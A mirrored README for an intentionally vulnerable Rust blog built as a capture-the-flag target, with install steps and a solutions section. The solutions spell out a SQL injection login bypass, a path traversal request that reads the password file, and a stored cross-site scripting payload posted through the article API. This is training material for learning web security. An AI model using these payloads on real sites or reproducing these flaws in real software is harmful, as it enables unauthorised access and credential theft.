Giter Club home page Giter Club logo

isep_a3-vulnerable_dummy_website's Introduction

Vulnerable dummy website

This is a dummy website meant to be a CTF target.

CTF scenario

A friend of yours who is learning web development asked you to help him test his simple blog website. You discover that there are security vulnerabilities in his website.

To complete the challenge, you have to:

  1. Log in as admin (easy)
  2. Get the admin password (medium)
  3. (Require 2) Publish an article which popup something when a user accesses the home page (hard)

Installation

Prerequisites

  • A Rust (minimum edition 2021) toolchain
  • A software to manage SQLite databases

Steps

  1. Clone the repository
  2. Create a passwd file and fill it with some password (make sure there is no whitespace after the text)
  3. Create a SQLite database in the server directory (either name it db.sqlite or change the name in Rocket.toml), and run the following query on it:
CREATE TABLE "users" (
  "username"  TEXT  NOT NULL UNIQUE,
  "password"  TEXT  NOT NULL,
  PRIMARY KEY("username")
)
  1. Start the web server with cargo run --release
  2. Go to http://localhost:8080/sign and register the admin user with the same password as in passwd
  3. Log out and you are ready to go !

CTF solutions

โš ๏ธ This section contains the solutions to the challenge. Take care not to read it if you want to do the challenge yourself !

1. Log in as admin

The login form is vulnerable to SQL injection. So you can log in with something like:

Username: admin';--
Password: admin

2. Get the admin password

The admin password is located in the passwd file.

The GET /article?file endpoint is vulnerable to path traversal. So you can get the file by requesting:

GET /article?file=../../passwd

3. Publish an article which popup something when a user accesses the home page

The POST /api/article endpoint is vulnerable to DOM injection, but we need a Basic authentication scheme to use the request. So you can create an article by requesting:

POST /api/article
Authorization: Basic <auth>
Content-Type: application/json

{
  "file": "vulnerable",
  "title": "<iframe src=\"javascript:alert('I am vulnerable')\">",
  "content": ""
}

where <auth> is the base64 representation of the string admin:<passwd> (<passwd> is the text you obtained in the previous task).

You can convert a string into base64 using JavaScript's btoa function for example.

Now, whenever a user goes to the home page, an alert saying I am vulnerable pops up.

isep_a3-vulnerable_dummy_website's People

Contributors

dragonink avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.